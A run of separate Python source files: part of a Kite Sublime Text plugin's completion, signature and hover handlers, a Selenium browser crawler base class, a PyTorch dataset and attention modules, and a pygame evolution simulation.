cls._find_inserted_completion(view) if inserted_completion and not is_snippet: inserted_text = inserted_completion['snippet']['text'] replace_begin = inserted_completion['replace']['begin'] logger.debug('inserted {} / {} -> {}:\n{}' .format(cls._last_init_prefix, cls._last_prefix, inserted_text, cls._completion_str(inserted_completion))) in_buffer = _get_view_substr(view, replace_begin, replace_begin + len(inserted_text)) if inserted_text == in_buffer: cls._process_matched_replace_text(view, region, inserted_completion) else: cls._process_unmatched_replace_text(view, region, inserted_completion) elif inserted_completion and is_snippet: replace = inserted_completion['post_commit']['replace'] view.run_command('kite_view_erase', { 'range': (replace['begin'], replace['end']), }) else: logger.debug('no matching completion') @classmethod def _process_matched_replace_text(cls, view, region, inserted): inserted_text = inserted['snippet']['text'] word_region = view.word(region.b) word = _get_view_substr(view, word_region.a, word_region.b) logger.debug('word: {}, inserted: {}'.format(word, inserted_text)) if word == inserted_text: logger.debug('word matches, nothing to do!') return replace_begin = inserted['replace']['begin'] replace_end = inserted['replace']['end'] chars_to_trim = replace_end - replace_begin leftover_chars = chars_to_trim - \ (cls._last_location - cls._last_init_location) - \ len(cls._last_init_prefix) logger.debug('chars to trim: {}, leftover: {}' .format(chars_to_trim, leftover_chars)) if leftover_chars > 0: logger.debug('trimming: {}' .format(_get_view_substr(view, region.b, region.b + leftover_chars))) view.run_command('kite_view_erase', { 'range': (region.b, region.b + leftover_chars), }) @classmethod def _process_unmatched_replace_text(cls, view, region, inserted): inserted_text = inserted['snippet']['text'] replace_begin = inserted['replace']['begin'] replace_end = inserted['replace']['end'] chars_to_trim = replace_end - replace_begin - len(cls._last_prefix) trim_before = (replace_begin, region.b - len(inserted_text)) trimmed = trim_before[1] - trim_before[0] rem_chars = chars_to_trim - trimmed trim_after = (region.b, region.b + rem_chars) logger.debug('trim before {} = {}' .format(trim_before, _get_view_substr(view, trim_before[0], trim_before[1]))) logger.debug('trim after {} = {}' .format(trim_after, _get_view_substr(view, trim_after[0], trim_after[1]))) # This is a hack that handles the situation when dict keys are inserted # from an attribute expression. In this case, the typed out attribute # is already completely replaced by the index expression, so the only # character that needs to be trimmed is the leading ".". before_str = _get_view_substr(view, trim_before[0], trim_before[1]) attr_to_dict_key = (before_str == '.' and inserted_text[0] == '[' and inserted_text[-1] == ']') view.run_command('kite_view_erase', {'range': trim_before}) if not attr_to_dict_key: view.run_command('kite_view_erase', { 'range': (trim_after[0] - trimmed, trim_after[1] - trimmed), }) @classmethod def _find_inserted_completion(cls, view): if len(view.sel()) != 1: return None region = view.sel()[0] is_snippet = not region.empty() def _search(_completions): candidates = [] for _c in _completions: text = _c['snippet']['text'] in_buffer = _get_view_substr(view, region.a - len(text), region.a) if in_buffer == text: candidates.append(_c) if 'children' in _c: candidates.extend(_search(_c['children'])) return candidates def _search_snippet(_completions): candidates = [] for _c in _completions: if 'post_commit' not in _c: continue buffer = _c['post_commit']['buffer'] text = buffer['text'] in_buffer = _get_view_substr(view, buffer['start'], buffer['end']) logger.debug('comparing {} to {}'.format(text, in_buffer)) if in_buffer == text: candidates.append(_c) if 'children' in _c: candidates.extend(_search_snippet(_c['children'])) return candidates completions = (_search(cls._last_received_completions) if not is_snippet else _search_snippet(cls._last_received_completions)) logger.debug('possible matched completions: {}' .format(cls._completions_str(completions))) longest = None for i, c in enumerate(completions): if longest is None: longest = c elif len(c['snippet']['text']) > len(longest['snippet']['text']): longest = c return longest, is_snippet @staticmethod def _is_snippets_enabled(): return settings.get('enable_snippets', True) @classmethod def _request_completions(cls, view, data): logger.debug('fetching completions') resp, body = requests.kited_post('/clientapi/editor/complete', data) if resp.status != 200 or not body: logger.debug('no completions!') return resp_data = json.loads(body.decode('utf-8')) completions = resp_data['completions'] or [] logger.debug('received completions: {}' .format(cls._completions_str(completions, display_only=True))) with cls._lock: cls._last_received_completions = completions cls._last_location = data['position']['end'] cls._augment_completions_replace(view, cls._last_location, cls._last_received_completions) # Setting the last prefix inside the lock seems to hang on Linux and # Windows so we do it outside. Using Sublime's view API inside the # lock may be the reason. cls._last_prefix = _get_word(view, data['position']['end']) cls._last_trigger_char = _get_view_substr(view, data['position']['end'] - 1, data['position']['end']) logger.debug('last trigger char: "{}"'.format(cls._last_trigger_char)) cls._run_auto_complete(view) @classmethod def _augment_completions_replace(cls, view, position, completions): for c in completions: begin = c['replace']['begin'] end = c['replace']['end'] text = c['snippet']['text'] n = len(text) if begin >= position and end > begin: c['post_commit'] = { 'replace': { 'begin': begin + n, 'end': end + n, }, 'buffer': { 'start': position, 'end': position + n + end - begin, 'text': '{}{}'.format(text, _get_view_substr(view, begin, end)), }, } @classmethod def _run_auto_complete(cls, view): # Don't refresh if Kite doesn't have completions. Sublime will # filter the completions for us automatically. Note that Sublime # performs fuzzy matching so it is possible that Kite will suggest # completions that aren't exactly prefix matched. with cls._lock: if len(cls._last_received_completions) == 0: logger.debug('nothing to do: no new completions') return # It seems like the `auto_complete` command does not always result in # `on_query_completions` from being triggered if a completion list is # currently shown, so we need to hide it first. # # However, we only need to refresh the completions UI if the incoming # completions contain any completions that were not in the previous # list. Otherwise, Sublime will filter the UI automatically. # # We also need to force the completions UI to show when the user # types a space, because Sublime will hide the completions otherwise. if not cls._is_completions_subset() or cls._last_trigger_char == ' ': view.run_command('hide_auto_complete') view.run_command('auto_complete', { 'api_completions_only': True, 'disable_auto_insert': True, 'next_completion_if_showing': False, }) else: logger.debug('nothing to do: completions are subset') @classmethod def _is_completions_subset(cls): with cls._lock: # both sets of completions are in the Kite's original data format previous = cls._flatten_completions(cls._last_init_completions) current = cls._flatten_completions(cls._last_received_completions) if len(previous) == 0 or len(current) > len(previous): return False for index, item in enumerate(current): if not any((cls._completions_equal(item, prev_item) for prev_item in previous)): return False return True @classmethod def _clear_cache(cls): cls._last_location = None cls._last_prefix = None cls._last_trigger_char = None cls._last_received_completions = [] cls._last_init_location = None cls._last_init_prefix = None cls._last_init_completions = [] @staticmethod def _completions_equal(lhs, rhs): return lhs[0] == rhs[0] and lhs[1] == rhs[1] @classmethod def _flatten_completions(cls, completions, nesting=0): if not completions: return [] result = [] for c in completions: # We were previously using _is_snippets_enabled to branch on old/new # logic, but it appears that sometimes this check fails so we need # handle each completion item individually. # # See: https://rollbar.com/Kite/sublime-prod/items/14275/ if 'snippet' not in c: result.append(( cls._brand_completion(c['display'], c['hint']), c['insert'] )) else: result.append((cls._brand_completion(c['display'], c['hint']), cls._placeholder_text(c))) if 'children' in c: result.extend(cls._flatten_completions(c['children'], nesting + 1)) return result @staticmethod def _placeholder_text(completion): text = completion['snippet']['text'] try: placeholders = completion['snippet']['placeholders'] or [] # sort placeholders in reverse order for easier string patching # we assume that placeholders do not overlap copy = sorted(placeholders, key=lambda i: i['begin'], reverse=True) for p in copy: a, b = p['begin'], p['end'] # +1 because $0 is the last placeholder index = placeholders.index(p) + 1 text = text[:a] + "${{{}:{}}}".format(index, text[a:b]) \ + text[b:] except KeyError: return completion['snippet']['text'] return text @staticmethod def _brand_completion(symbol, hint=None): return ('{}\t{} ⟠'.format(symbol, hint) if hint else '{}\t⟠'.format(symbol)) @classmethod def _event_data(cls, view, location): if isinstance(location, list): a, b = location[0], location[1] else: a, b = location, location return { 'filename': realpath(view.file_name()), 'editor': 'sublime3', 'text': view.substr(sublime.Region(0, view.size())), 'offset_encoding': 'utf-32', 'position': { 'begin': a, 'end': b, }, 'no_snippets': not cls._is_snippets_enabled(), } @staticmethod def _event_data_old(view, location): return { 'filename': realpath(view.file_name()), 'editor': 'sublime3', 'text': view.substr(sublime.Region(0, view.size())), 'cursor_runes': location, } @staticmethod def _prune_completion(completion, display_only=False): if not display_only: fields = ('snippet', 'replace', 'display', 'post_commit') return {k: completion.get(k, None) for k in fields} else: return completion.get('display', None) @classmethod def _completions_str(cls, completions, display_only=False): def _help(completions, nesting=0): if not completions: return [] result = [] for c in completions: # We were previously using _is_snippets_enabled to branch on # old/new logic, but it appears that sometimes this check fails # so we need handle each completion item individually. # # See: https://rollbar.com/Kite/sublime-prod/items/14275/ if 'snippet' not in c: result.append(cls._prune_completion(c, display_only)) else: result.append(cls._prune_completion(c, display_only)) if 'children' in c: result.extend(_help(c['children'], nesting + 1)) return result return logger.jsonstr(_help(completions)) @classmethod def _completion_str(cls, completion): return logger.jsonstr(cls._prune_completion(completion)) class SignaturesHandler(sublime_plugin.EventListener): """Listener which handles signatures by sending requests to the signatures endpoint and rendering the returned data. """ _activated = False _view = None _call = None _lock = Lock() _template_path = 'Packages/KiteSublime/lib/assets/' \ 'function-signature-panel.html' _template = None _css_path = 'Packages/KiteSublime/lib/assets/styles.css' _css = '' def on_post_text_command(self, view, command_name, args): if command_name in ('kite_toggle_popular_patterns', 'kite_toggle_keyword_arguments'): self.__class__._rerender() def on_query_context(self, view, key, operator, operand, match_all): if (key == 'kite_signature_shown' and _is_view_supported(view) and self.__class__._activated): # In case Vintage is enabled, make sure we switch to command mode. # Questionable if this is the right behavior, since it differs # from the builtin behavior with respect to what happens when the # user hits escape while completions are shown - In this case, the # user still has to hit escape twice to enter command mode. However, # since we've received feedback about this, we've enabled this # behavior and have made it configurable. if settings.get('hide_signatures_enters_command_mode', True): view.run_command('exit_insert_mode') return True return None @classmethod def queue_signatures(cls, view, location): deferred.defer(cls._request_signatures, view, cls._event_data(view, location)) @classmethod def hide_signatures(cls, view): reset = False if cls._lock.acquire(blocking=False): if cls._activated: cls._activated = False cls._view = None cls._call = None reset = True cls._lock.release() if reset: view.hide_popup() @classmethod def hide_signatures_if_showing(cls, view): reset = False if cls._lock.acquire(blocking=False): if cls._activated: cls._activated = False cls._view = None cls._call = None reset = True cls._lock.release() if reset: # This needs to be deferred to handle a race condition when the # user is using Vintage. When command mode is entered, the cursor # moves back one character, which causes signatures to be requested # again. See this class's method `on_query_context` above. deferred.defer(view.hide_popup) @classmethod def is_activated(cls): return cls._activated @classmethod def _request_signatures(cls, view, data): resp, body = requests.kited_post('/clientapi/editor/signatures', data) if resp.status != 200 or not body: if resp.status in (400, 404): cls.hide_signatures(view) return resp_data = json.loads(body.decode('utf-8')) calls = resp_data['calls'] or [] if len(calls): call = calls[0] if call['callee']['kind'] == 'type': call['callee']['details']['function'] = ( call['callee']['details']['type']['language_details'] ['python']['constructor']) ret = [{'type': call['func_name']}] call['callee']['details']['function']['return_value'] = ret # Separate out the keyword-only parameters func = call['callee']['details']['function'] func.update({ 'positional_parameters': [], 'keyword_only_parameters': [], }) for _, param in enumerate(func['parameters'] or []): param_details = param['language_details']['python'] if not param_details['keyword_only']: func['positional_parameters'].append(param) else: func['keyword_only_parameters'].append(param) in_kwargs = call['language_details']['python']['in_kwargs'] content = None if cls._lock.acquire(blocking=False): cls._activated = True cls._view = view cls._call = call content = cls._render(call) cls._lock.release() requested_pos = data['cursor_runes'] current_pos = EventDispatcher._last_selection_region['end'] if content is not None and requested_pos == current_pos: view.show_popup(content, flags=sublime.COOPERATE_WITH_AUTO_COMPLETE, max_width=400, on_navigate=cls._handle_link_click) @classmethod def _render(cls, call): if is_development() or cls._template is None: cls._template = Template(sublime.load_resource(cls._template_path)) cls._css = sublime.load_resource(cls._css_path) opts = { 'platform': sys.platform, 'os_version': os_version(), 'show_popular_patterns': settings.get('show_popular_patterns'), 'show_keyword_arguments': settings.get('show_keyword_arguments'), 'keyword_argument_highlighted': cls._kwarg_highlighted(), 'keyword_arguments_keys': keymap.keystr(keymap.get('kite_toggle_keyword_arguments')), 'popular_patterns_keys': keymap.keystr(keymap.get('kite_toggle_popular_patterns')), } return htmlmin.minify(cls._template.render(css=cls._css, call=call, **opts), remove_all_empty_space=True) @classmethod def _rerender(cls): content = None if cls._lock.acquire(blocking=False): content = cls._render(cls._call) if cls._activated else None cls._lock.release() if content is not None: cls._view.show_popup(content, flags=sublime.COOPERATE_WITH_AUTO_COMPLETE, max_width=400, on_navigate=cls._handle_link_click) @classmethod def _handle_link_click(cls, target): if target == 'hide_popular_patterns': settings.set('show_popular_patterns', False) cls._rerender() elif target == 'show_popular_patterns': settings.set('show_popular_patterns', True) cls._rerender() elif target == 'hide_keyword_arguments': settings.set('show_keyword_arguments', False) cls._rerender() elif target == 'show_keyword_arguments': settings.set('show_keyword_arguments', True) cls._rerender() elif (target.startswith('open_browser') or target.startswith('open_copilot')): idx = target.find(':') if idx == -1: logger.debug('invalid open link format: {}'.format(target)) return action = target[:idx] ident = target[idx + 1:] if action == 'open_browser': link_opener.open_browser(ident) else: link_opener.open_copilot(ident) @classmethod def _kwarg_highlighted(cls): return (cls._activated and cls._call['language_details']['python']['in_kwargs'] and cls._call['arg_index'] != -1) @staticmethod def _event_data(view, location): return { 'editor': 'sublime3', 'filename': realpath(view.file_name()), 'text': view.substr(sublime.Region(0, view.size())), 'cursor_runes': location, } class HoverHandler(sublime_plugin.EventListener): """Listener which listens to the user's mouse position and forwards requests to the hover endpoint. """ _template_path = 'Packages/KiteSublime/lib/assets/hover-panel.html' _template = None _css_path = 'Packages/KiteSublime/lib/assets/styles.css' _css = '' def on_hover(self, view, point, hover_zone): if not settings.get('show_hover', True): return if hover_zone != sublime.HOVER_TEXT: return if (_is_view_supported(view) and _check_view_size(view) and len(view.sel()) == 1): cls = self.__class__ deferred.defer(cls._request_hover, view, point) @classmethod def symbol_at_cursor(cls, view, render=False): if (not _is_view_supported(view) or not _check_view_size(view) or len(view.sel()) != 1): return (None, None) view = sublime.active_window().active_view() point = view.sel()[0].end() points = view.word(point) resp, body = requests.kited_get(cls._event_url(view, point)) if resp.status != 200 or not body: return (points, None) try: resp_data = json.loads(body.decode('utf-8')) symbol = None if not resp_data['symbol'] else resp_data['symbol'][0] if symbol and render: symbol['hint'] = cls._symbol_hint(symbol) def func(): view.show_popup(cls._render(symbol, resp_data['report'], view, point), max_width=1024, location=point, on_navigate=cls._handle_link_click) sublime.set_timeout_async(func, 0) return points, symbol except ValueError as ex: return points, None @classmethod def _request_hover(cls, view, point): resp, body = requests.kited_get(cls._event_url(view, point)) if resp.status != 200 or not body: return resp_data = json.loads(body.decode('utf-8')) if resp_data['symbol'] is None: return symbol = resp_data['symbol'][0] symbol['hint'] = cls._symbol_hint(symbol) view.show_popup(cls._render(symbol, resp_data['report'], view, point), flags=sublime.HIDE_ON_MOUSE_MOVE_AWAY, max_width=1024, location=point, on_navigate=cls._handle_link_click) @classmethod def _render(cls, symbol, report, view=None, point=None): if is_development() or cls._template is None: cls._template = Template(sublime.load_resource(cls._template_path)) cls._css = sublime.load_resource(cls._css_path) defs = None refs = None if settings.get_global('show_definitions'): window = sublime.active_window() defs = window.lookup_symbol_in_index(symbol['name']) refs = [] try: # It seems like this function was removed at some point. It # still works on some installations of Sublime 3 though. # # See: https://rollbar.com/Kite/sublime-prod/items/22783/ refs = window.lookup_references_in_index(symbol['name']) except AttributeError: pass if view is not None and point is not None: line, col = view.rowcol(point) filename = realpath(view.file_name()) defs = [d for d in defs if d[0] != filename or d[2][0] != line + 1] refs = [r for r in refs if r[0] != filename or r[2][0] != line + 1] return htmlmin.minify(cls._template.render(css=cls._css, platform=sys.platform, os_version=os_version(), symbol=symbol, report=report, definitions=defs, references=refs), remove_all_empty_space=True) @classmethod def _handle_link_click(cls, target): if (target.startswith('open_browser') or target.startswith('open_copilot')): idx = target.find(':') if idx == -1: logger.debug('invalid open link format: {}'.format(target)) return action = target[:idx] ident = target[idx + 1:] if action == 'open_browser': link_opener.open_browser(ident) else: link_opener.open_copilot(ident) elif target.startswith('open_definition'): idx = target.find(':') if idx == -1: logger.debug('invalid open definition format: {}' .format(target)) return dest = target[idx + 1:] if not dest[dest.rfind(':') + 1:].isdigit(): logger.debug('invalid open definition format: {}' .format(target)) return sublime.active_window().open_file(dest, flags=sublime.ENCODED_POSITION) @staticmethod def _event_url(view, point): editor = 'sublime3' filename = quote(path_for_url(realpath(view.file_name()))) hash_ = _md5(view.substr(sublime.Region(0, view.size()))) return ('/api/buffer/{}/{}/{}/hover?cursor_runes={}' .format(editor, filename, hash_, point)) @staticmethod def _symbol_hint(symbol): if symbol['value'][0]['kind'] != 'instance': return symbol['value'][0]['kind'] else: unique_types = [] for v in symbol['value']: if v['kind'] != 'instance': continue if v['type'] not in unique_types: unique_types.append(v['type']) if len(unique_types) == 3: break return ' | '.join(unique_types) class StatusHandler(sublime_plugin.EventListener): """Listener which sets the status bar message when the view is activated and on every selection event. """ _status_key = 'kite' def on_activated(self, view): deferred.defer(self.__class__._handle, view) def on_selection_modified(self, view): deferred.defer(self.__class__._handle, view) @classmethod def erase_all_statuses(cls): for w in sublime.windows(): for v in w.views(): v.erase_status(cls._status_key) @classmethod def _handle(cls, view): if not _is_view_supported(view): view.erase_status(cls._status_key) return if not _check_view_size(view): view.set_status(cls._status_key, cls._brand_status('File too large')) return try: url = ('/clientapi/status?filename={}' .format(quote(realpath(view.file_name())))) resp, body = requests.kited_get(url) if resp.status != 200 or not body: view.set_status(cls._status_key, cls._brand_status('Server error')) else: resp_data = json.loads(body.decode('utf-8')) status = resp_data['status'] if status == 'noIndex': status = 'Ready (unindexed)' else: status = status.capitalize() view.set_status(cls._status_key, cls._brand_status(status)) except ConnectionRefusedError as ex: view.set_status(cls._status_key, cls._brand_status('Connection error')) except ExpectedError as exc: if isinstance(exc.exc, ConnectionRefusedError): view.set_status(cls._status_key, cls._brand_status('Connection error')) except CannotSendRequest as ex: logger.debug('could not request status: {}'.format(ex)) @classmethod def _brand_status(cls, status): return '𝕜𝕚𝕥𝕖: {}'.format(status) class MaxFileSizeUpdater(sublime_plugin.EventListener): """Listener which updates MAX_FILE_SIZE when a file is focused """ def on_activated(self, view): deferred.defer(self.__class__._handle, view) @classmethod def _handle(cls, view): try: resp, body = requests.kited_get( '/clientapi/settings/max_file_size_kb') if resp.status == 200 and body: max_file_size_kb = json.loads(body.decode('utf-8')) MAX_FILE_SIZE = max_file_size_kb << 10 except: pass
from concurrent.futures.thread import ThreadPoolExecutor from json import load from selenium.webdriver.remote.webdriver import WebDriver from selenium import webdriver from selenium.webdriver.edge.options import Options as EdgeOptions from time import perf_counter, sleep from selenium.webdriver.common.desired_capabilities import DesiredCapabilities from strformat import StrFormat from platform import system SYSTEM = system() class Crawler: def __init__(self, runtime: dict) -> None: self.config = load(open("startups.json", 'r')) self.ids = runtime["illusts"] self.mode = runtime["mode"] self.headless = "headless" in runtime.keys() self.illusts: dict[str, str] = {} self.pictures: dict[str, list[str]] = {} self.illust_url_base = "" self.pic_url_base = "" self.cap = Crawler.get_cap(runtime) @staticmethod def get_cap(runtime: dict): if "cap" in runtime.keys(): cap = runtime["cap"][0] if cap.isnumeric(): cap = int(cap) if not cap or not isinstance(cap, int): StrFormat.severe_warning("the argument for --cap must be a positive integer.") exit(1) elif cap == 'none': cap = None else: StrFormat.severe_warning("the argument for --cap must be numeric or 'none'.") exit(1) return cap def map(self, id: str): raise NotImplementedError def maps(self): StrFormat.info("Mapping ID...") start = perf_counter() with ThreadPoolExecutor() as pool: for id in self.ids: self.map(id) end = perf_counter() if len(self.illusts) != len(self.ids): exit(1) StrFormat.mapping(self.illusts.keys(), self.illusts.values()) print(f"{StrFormat.functional('Mapping')} finished successfully in {StrFormat.time_str(end - start)}.") def get(self, id: str, name: str): raise NotImplementedError def gets(self): start = perf_counter() with ThreadPoolExecutor(max_workers=4) as pool: for id, name in self.illusts.items(): if self.config["browser"] == 'firefox': pool.submit(self.get, id, name) else: self.get(id, name) end = perf_counter() # dump(self.pictures, open("test.json", 'w'), indent=4) print(f"{StrFormat.functional('Crawling')} finished successfully in {StrFormat.time_str(end - start)}.") @staticmethod def scroll(driver: WebDriver): for i in range(1, 5): driver.execute_script( f''' var i = {i} * document.body.scrollHeight/4; window.scrollTo(0,i); ''' ) sleep(2) @staticmethod def init_webdriver(config: dict, headless: bool, is_async=False): cap = None match config["browser"]: case "firefox": options = webdriver.FirefoxOptions() options.headless = headless options.profile = config["firefox"]["profile"] if is_async: cap = DesiredCapabilities.FIREFOX cap["pageLoadStrategy"] = "none" return webdriver.Firefox(options=options, desired_capabilities=cap) case "chrome": options = webdriver.ChromeOptions() if SYSTEM == "Linux": options.headless = headless if headless: options.add_argument("window-size=1920,1080") options.add_experimental_option('excludeSwitches', ['enable-logging']) sep = config["chrome"]["profile"].rfind('/') usr_data_dir, prof_dir = config["chrome"]["profile"][:sep], config["chrome"]["profile"][sep+1:] options.add_argument(f"user-data-dir={usr_data_dir}") options.add_argument(f'profile-directory={prof_dir}') if is_async: cap = DesiredCapabilities.CHROME cap["pageLoadStrategy"] = "none" return webdriver.Chrome(options=options, desired_capabilities=cap) case "edge": options = EdgeOptions() options.use_chromium = True options.headless = headless if headless: options.add_argument("window-size=1920,1080") options.add_experimental_option('excludeSwitches', ['enable-logging']) sep = config["edge"]["profile"].rfind('/') usr_data_dir, prof_dir = config["edge"]["profile"][:sep], config["edge"]["profile"][sep+1:] options.add_argument(f"user-data-dir={usr_data_dir}") options.add_argument(f'profile-directory={prof_dir}') if SYSTEM == 'Linux': options.binary_location = config["edge"]["linux_bin_path"] if is_async: cap = DesiredCapabilities.EDGE cap["pageLoadStrategy"] = "none" return webdriver.Edge(options=options, capabilities=cap)
""" The Code is under Tencent Youtu Public Rule """ from PIL import Image from torch.utils.data import Dataset #val,l-train dataset class MyDataset(Dataset): """ Interface provided for customized data sets names_file:a txt file, each line in the form of "image_path label" transform: transform pipline for mydataset """ def __init__(self, names_file, transform=None): self.names_file = names_file self.transform = transform self.size = 0 self.names_list = [] file = open(self.names_file) for f in file: self.names_list.append(f) self.size += 1 def __len__(self): return self.size def __getitem__(self, idx): image_path = self.names_list[idx].split(' ')[0] image = Image.open(image_path) if(image.mode == 'L'): image = image.convert('RGB') label = int(self.names_list[idx].split(' ')[1]) if self.transform: image = self.transform(image) return image, label
from typing import List import numpy as np import torch import torch.nn as nn class ScaledDotProductAttention(nn.Module): def __init__(self, temperature, attn_dropout=0.1): super().__init__() self.temperature = temperature self.dropout = nn.Dropout(attn_dropout) self.softmax = nn.Softmax(dim=2) def forward(self, q, k, v, mask=None): attn = torch.bmm(q, k.transpose(1, 2)) attn = attn / self.temperature if mask is not None: attn = attn.masked_fill(mask, -np.inf) attn = self.softmax(attn) attn = self.dropout(attn) output = torch.bmm(attn, v) return output, attn class MultiHeadAttention(nn.Module): def __init__(self, n_head: int, d_model: List[int], d_k: int, d_v: int, dropout: float = 0.1): super().__init__() d_model = np.prod(d_model) self.n_head = n_head self.d_k = d_k self.d_v = d_v self.w_qs = nn.Linear(d_model, n_head * d_k) self.w_ks = nn.Linear(d_model, n_head * d_k) self.w_vs = nn.Linear(d_model, n_head * d_v) nn.init.normal_(self.w_qs.weight, mean=0, std=np.sqrt(2.0 / (d_model + d_k))) nn.init.normal_(self.w_ks.weight, mean=0, std=np.sqrt(2.0 / (d_model + d_k))) nn.init.normal_(self.w_vs.weight, mean=0, std=np.sqrt(2.0 / (d_model + d_v))) self.attention = ScaledDotProductAttention( temperature=np.power(d_k, 0.5)) self.layer_norm = nn.LayerNorm(d_model) self.fc = nn.Linear(n_head * d_v, d_model) nn.init.xavier_normal_(self.fc.weight) self.dropout = nn.Dropout(dropout) # def forward(self, q, k, v, mask=None): def forward(self, q, k, v): d_k, d_v, n_head = self.d_k, self.d_v, self.n_head sz_b, len_q, _ = q.size() sz_b, len_k, _ = k.size() sz_b, len_v, _ = v.size() residual = q q = self.w_qs(q).view(sz_b, len_q, n_head, d_k) k = self.w_ks(k).view(sz_b, len_k, n_head, d_k) v = self.w_vs(v).view(sz_b, len_v, n_head, d_v) q = q.permute(2, 0, 1, 3).contiguous().view(-1, len_q, d_k) # (n*b) x lq x dk k = k.permute(2, 0, 1, 3).contiguous().view(-1, len_k, d_k) # (n*b) x lk x dk v = v.permute(2, 0, 1, 3).contiguous().view(-1, len_v, d_v) # (n*b) x lv x dv # mask = mask.repeat(n_head, 1, 1) # (n*b) x .. x .. # output, attn = self.attention(q, k, v, mask=mask) output, attn = self.attention(q, k, v) output = output.view(n_head, sz_b, len_q, d_v) output = output.permute(1, 2, 0, 3).contiguous().view(sz_b, len_q, -1) # b x lq x (n*dv) output = self.dropout(self.fc(output)) output = self.layer_norm(output + residual) return output, attn class MultiHeadAttentionConv(nn.Module): def __init__(self, n_head: int, d_model: List[int], d_k: int, d_v: int, dropout: float = 0.1): super().__init__() self.n_head = n_head self.d_k = d_k self.d_v = d_v self.d_model = d_model C, H, W = d_model out_ch_k = int((n_head * d_k) / (H * W)) out_ch_v = int((n_head * d_v) / (H * W)) self.w_qs = nn.Conv2d(C, out_ch_k, 1, 1, 0) self.w_ks = nn.Conv2d(C, out_ch_k, 1, 1, 0) self.w_vs = nn.Conv2d(C, out_ch_v, 1, 1, 0) nn.init.normal_(self.w_qs.weight, mean=0, std=np.sqrt(2.0 / (C + d_k))) nn.init.normal_(self.w_ks.weight, mean=0, std=np.sqrt(2.0 / (C + d_k))) nn.init.normal_(self.w_vs.weight, mean=0, std=np.sqrt(2.0 / (C + d_v))) self.attention = ScaledDotProductAttention( temperature=np.power(d_k, 0.5)) self.layer_norm = nn.InstanceNorm2d(C) self.fc = nn.Conv2d(out_ch_v, C, 1, 1, 0) nn.init.xavier_normal_(self.fc.weight) self.dropout = nn.Dropout(dropout) # def forward(self, q, k, v, mask=None): def forward(self, q, k, v): d_k, d_v, n_head = self.d_k, self.d_v, self.n_head len_q, _, _, _ = q.size() len_k, _, _, _ = k.size() len_v, _, _, _ = v.size() residual = q q = self.w_qs(q).view(1, len_q, n_head, d_k) k = self.w_ks(k).view(1, len_k, n_head, d_k) v = self.w_vs(v).view(1, len_v, n_head, d_v) q = q.permute(2, 0, 1, 3).contiguous().view(-1, len_q, d_k) # (n*b) x lq x dk k = k.permute(2, 0, 1, 3).contiguous().view(-1, len_k, d_k) # (n*b) x lk x dk v = v.permute(2, 0, 1, 3).contiguous().view(-1, len_v, d_v) # (n*b) x lv x dv # mask = mask.repeat(n_head, 1, 1) # (n*b) x .. x .. # output, attn = self.attention(q, k, v, mask=mask) output, attn = self.attention(q, k, v) output = output.view(n_head, 1, len_q, d_v) _, H, W = self.d_model output = output.permute(1, 2, 0, 3).contiguous().view( len_q, -1, H, W) # b x lq x (n*dv) output = self.dropout(self.fc(output)) output = self.layer_norm(output + residual) return output, attn class RelationModule(torch.nn.Module): def __init__(self, ch_in, atype='dot_product'): super().__init__() self.atype = atype self.ch_in = ch_in self.ch_out = ch_in // 8 self.phi = nn.Linear(self.ch_in, self.ch_out) self.psi = nn.Linear(self.ch_in, self.ch_out) self.linear = nn.Linear(self.ch_in, self.ch_in) def __call__(self, x): N_roi, N_feat = x.shape phi_x = self.phi(x) psi_x = self.psi(x) if self.atype == 'dot_product': h = torch.matmul(psi_x, torch.transpose(phi_x, 0, 1)) else: raise NotImplementedError h = torch.matmul(h, x) h = self.linear(h) / len(h) return h + x # if __name__ == '__main__': # N_roi = 10 # N_feat = 256 # feat = torch.zeros((N_roi, N_feat)) # # module = RelationModule(N_feat) # module(feat)
import random import sys import pygame import time from src.carnivorous import * from src.food import * # Initialisation pygame.init() width, height = 800, 600 black = 0, 0, 0 # Black is for background white = 255, 255, 255 # White is for big winter event yellow = 255, 255, 0 # Yellow is for big summer event red = 255, 0, 0 # Carnivorous color brown = 90, 40, 0 # Meat color green = 0, 255, 0 # Vegetables color blue = 0, 0, 255 # Herbivorous color # Creating screen screen = pygame.display.set_mode((width, height)) # Alive entities, null by starting the simulation activeAnimals = [] activeFood = [] # Title pygame.display.set_caption("Evolution Simulation") # Drawing animals function: def drawing_animals(): for animal in activeAnimals: if animal.isCarnivorous: animal_color = red # carnivorous will all be red else: animal_color = blue # herbivorous will all be blue pygame.draw.circle(screen, animal_color, (animal.positionX, animal.positionY), animal.weight) def drawing_food(): for food in activeFood: if food.__class__ == basic_meet: food_color = brown # meat will all be brown else: food_color = green # vegetables will all be green pygame.draw.circle(screen, food_color, (food.positionX, food.positionY), food.size) # Simulation loop begin = True running = True simSpeed = 5 # Speed of the simulation (in FPS) randomMovementDirectionChangeTimer = random.randint(20, 30) timeToSpawnFood = 4 fpsCounter = 0 clock = pygame.time.Clock() while running: for event in pygame.event.get(): if event.type == pygame.QUIT: running = False # Background color screen.fill(black) # Spawn food if fpsCounter % timeToSpawnFood == 0: for i in range(10): activeFood.append(basic_meet(random.randint(50, width - 50), random.randint(50, height - 50))) # Updating food for food in activeFood: if food.quantity == 0: activeFood.remove(food) # Change animals movement direction if fpsCounter % randomMovementDirectionChangeTimer == 0: for current_animal in activeAnimals: current_animal.changeDirection() randomMovementDirectionChangeTimer = random.randint(20, 30) # Calculating new random direction change timer for current_animal in activeAnimals: activeAnimals = current_animal.action(width, height, activeAnimals, activeFood) # Drawing on the screen drawing_food() drawing_animals() pygame.display.update() fpsCounter += 1 clock.tick(simSpeed + 20) # Stats in console if fpsCounter % 100 == 0: print(len(activeAnimals)) # Initialisation of the sim if begin: while len(activeAnimals) < 30: activeAnimals.append(carnivorous(random.randint(55, width - 55), random.randint(55, height - 55))) activeAnimals.append(carnivorous(random.randint(55, width - 55), random.randint(55, height - 55), gender=1)) begin = False if __name__ == '__main__': print("Hello World")
